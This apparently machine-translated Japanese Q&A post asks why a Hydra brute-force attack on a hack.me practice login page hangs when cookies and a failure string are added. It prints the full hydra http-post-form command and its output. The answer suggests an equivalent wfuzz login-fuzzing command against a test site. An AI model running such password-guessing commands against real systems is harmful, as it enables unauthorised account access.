Kali Linux 2020.1でHydraツールを使用していて、hack.meでブルートフォースログインを試みています http://s123056-104737-qer.sipontum.hack.me/login.php =。私の問題は、Hydraを実行するたびにスタックすることです。
Burp Suiteを使用してCookieとエラー文字列 "invalid"を取得しました。Burpを介してIPも取得しました(解決されたホスト名を使用してみました)また、両方を使用しようとしましたhttp-get-form
およびhttp-post-form
これは私の命令です
hydra -l user -P passws.txt 74.50.111.245 http-post-form"/login.php:username=^USER^&password=^PASS^&Login=Login:invalid&Login=Login:H=Cookie: __utma=233483271.55664693.1581785552.1581785552.1581841829.2; __utmz=233483271.1581841829.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __unam=657356c-17049c563d0-1c1145bc-18; __utmc=233483271; PHPSESSID=v9njnd2g7e2gbalulmbgof9vt4" -I -V
そして、これは私が得るものです
hydra -l user -P passws.txt 74.50.111.245 http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:invalid&Login=Login:H=Cookie: __utma=233483271.55664693.1581785552.1581785552.1581841829.2; __utmz=233483271.1581841829.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __unam=657356c-17049c563d0-1c1145bc-18; __utmc=233483271; PHPSESSID=v9njnd2g7e2gbalulmbgof9vt4" -I -V
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-16 12:35:20
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking http-post-form://74.50.111.245:80/login.php:username=^USER^&password=^PASS^&Login=Login:invalid&Login=Login:H=Cookie: __utma=233483271.55664693.1581785552.1581785552.1581841829.2; __utmz=233483271.1581841829.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __unam=657356c-17049c563d0-1c1145bc-18; __utmc=233483271; PHPSESSID=v9njnd2g7e2gbalulmbgof9vt4
[ATTEMPT] target 74.50.111.245 - login "user" - pass "uba" - 1 of 7 [child 0] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "milan" - 2 of 7 [child 1] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "admin" - 3 of 7 [child 2] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "foca" - 4 of 7 [child 3] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "password" - 5 of 7 [child 4] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "trota" - 6 of 7 [child 5] (0/0)
[ATTEMPT] target 74.50.111.245 - login "user" - pass "Ciaociao.90" - 7 of 7 [child 6] (0/0)
この後、それは永久にハングします。毎分私はこのような出力を得ます
[STATUS] 7.00 tries/min, 7 tries in 00:01h, 1 to do in 00:01h, 7 active
しかし毎回減少する試行/分で
Cookieと失敗文字列を含めずにコマンドを実行すると機能しますが、もちろん、失敗したログインと区別して成功したログインを区別することはできません。別のコンピューターと仮想マシンからこのコマンドを実行しようとしましたが、成功しませんでした。
どうすればいいのかわかりません。
Hydraは多くの偽陽性を示しますが、少なくともこれは私の経験です。代わりに、この構文でwfuzzをポストリクエストwfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"
http://testphp.vulnweb.com/userinfo.php
サーバーからの応答として3xxコードが表示されると、正しいパスワードがわかります。
これは公式ドキュメントへのリンクです https://wfuzz.readthedocs.io/en/latest/user/basicusage.html